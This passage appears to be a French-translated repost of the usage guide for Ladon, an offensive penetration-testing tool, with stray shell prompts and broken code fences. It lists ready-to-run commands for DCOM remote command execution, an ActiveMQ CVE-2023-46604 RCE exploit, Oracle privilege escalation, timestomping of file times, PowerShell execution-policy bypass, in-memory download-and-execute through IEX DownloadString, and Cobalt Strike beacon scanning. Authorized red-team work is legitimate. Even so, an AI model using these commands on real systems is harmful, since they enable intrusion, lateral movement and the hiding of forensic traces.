  help        Display more information on a specific command.

  version     Display version information.
250 Dcom exécution de commandes à distance via MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Exécution de commande à distance Dcom via ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Exécution de commande à distance Dcom via ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm Détection des informations système (ports 25, 465, 587)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 Informations système de détection HTTP/S Ntlm```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP Interrogation à distance de l'IP des utilisateurs du domaine```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 Détecter si l'utilisateur est administrateur Lotus```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 Serveur HTA Démarrage en un clic Accéder à DOC permet également d'exécuter HTA```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer détection de version Confluence```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD peut être utilisé pour localiser les connexions des utilisateurs Active Directory, énumérer les utilisateurs du domaine```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Outil d'élévation de privilèges à distance pour base de données Oracle pilote officiel >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Outil d'élévation de privilèges à distance pour Oracle Database – 3 méthodes d'élévation en un clic```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS Compilation dynamique de fichiers de code c#```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Modifier l'heure du fichier / Spécifier l'heure du fichier

Utilisation: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### Modifier l'heure du fichier Copier l'heure du fichier```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

Version PowerShell Ladon.ps1

0x001 Exécution interactive de Cmd```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 Exécution locale non interactive```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 Exécution de chargement en mémoire à distance```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Contourner la stratégie par défaut d'exécution de PowerShell```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 Scan de ports personnalisé```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon détection des hôtes actifs```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

Scan de ports personnalisé CS Beacon```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
Détection de vulnérabilité MS17010 par CS Beacon```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

Exemple

http://k8gege.org/Ladon/example-en.html

Dernière version

Dernière version en petit sceau : http://k8gege.org/Ladon/update.txt

Stargazers au fil du temps

Stargazers au fil du temps

Télécharger l’outil